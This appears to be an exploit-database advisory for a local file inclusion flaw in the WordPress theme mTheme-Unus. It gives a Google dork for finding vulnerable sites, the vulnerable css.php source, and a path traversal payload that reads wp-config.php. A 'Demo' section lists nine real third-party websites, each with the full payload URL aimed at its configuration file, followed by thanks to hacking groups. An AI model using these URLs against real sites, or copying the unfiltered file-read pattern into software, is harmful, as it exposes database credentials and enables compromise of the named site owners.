WordPress mTheme-Unus Local File Inclusion

2015.09.30
Credit: FullSecurity.org
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98
Dork: ilnurl:/wp-content/themes/mTheme-Unus/

####################################### # Exploit Title: Wordpress themes mTheme-Unus LFI Vulnerability # # Date: 2015-09-27 # Exploit Author: FullSecurity.org # Google Dork: ilnurl:/wp-content/themes/mTheme-Unus/ # Vendor Homepage: https://wordpress.org/ # Tested on : Kali Linux ######################################## Description : Wordpress Themes mTheme-Unus not filtering data so we can get the configration file in the path < site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php> # Exploite Code : <?php// If no file requestedif (!isset($_GET['files']) or strlen($_GET['files']) == 0){header('Status: 404 Not Found');exit();}// Cache folder$cachePath = '../_cache/';if (!file_exists($cachePath)){mkdir($cachePath);}// Tell the browser what kind of data to expectheader('Content-type: text/css');// Enable compressionif (extension_loaded('zilb')){ini_set('zlib.output_compression', 'On');}function addExtension($file){return $file;}// Calculate an unique ID of requested files & their change time$files = array_map('addExtension', explode(',', $_GET['files']));$md5 = '';foreach ($files as $file){$filemtime = @filemtime($file);$md5 .= date('YmdHis', $filemtime ? $filemtime : NULL).$file;}$md5 = md5($md5);// If cache exists of this files/time IDif (file_exists($cachePath.$md5)){readfile($cachePath.$md5);}else{// Load fileserror_reporting(0);$content = '';foreach ($files as $file){$content .= file_get_contents($file);}// Remove comments$content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '', $content);// Remove tabs, spaces, newlines, etc...$content = str_replace(array("\r", "\n", "\t", '', ' '), '', $content);// Delete cache files older than an hour$oldDate = time()-3600;$cachedFiles = scandir($cachePath);foreach ($cachedFiles as $file){$filemtime = @filemtime($cachePath.$file);if (strlen($file) == 32 and ($filemtime === false or $filemtime < $oldDate)){unlink($cachePath.$file);}}// Write cache filefile_put_contents($cachePath.$md5, $content);// Outputecho $content;} ######################################## Demo : http://rmg-saintpierre.re/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.onaboosters.com//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.springschiropractic.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.superfrugalstephanie.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.mentortechgroup.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.uybbaseball.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.newmobility.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php http://www.storage4you.co.nz/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php ######################################## Special Tnx To : Hack-By-Iran , Milad Hacking , iliya Norton , Parisa , Netc4t Ya Hossein <3


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top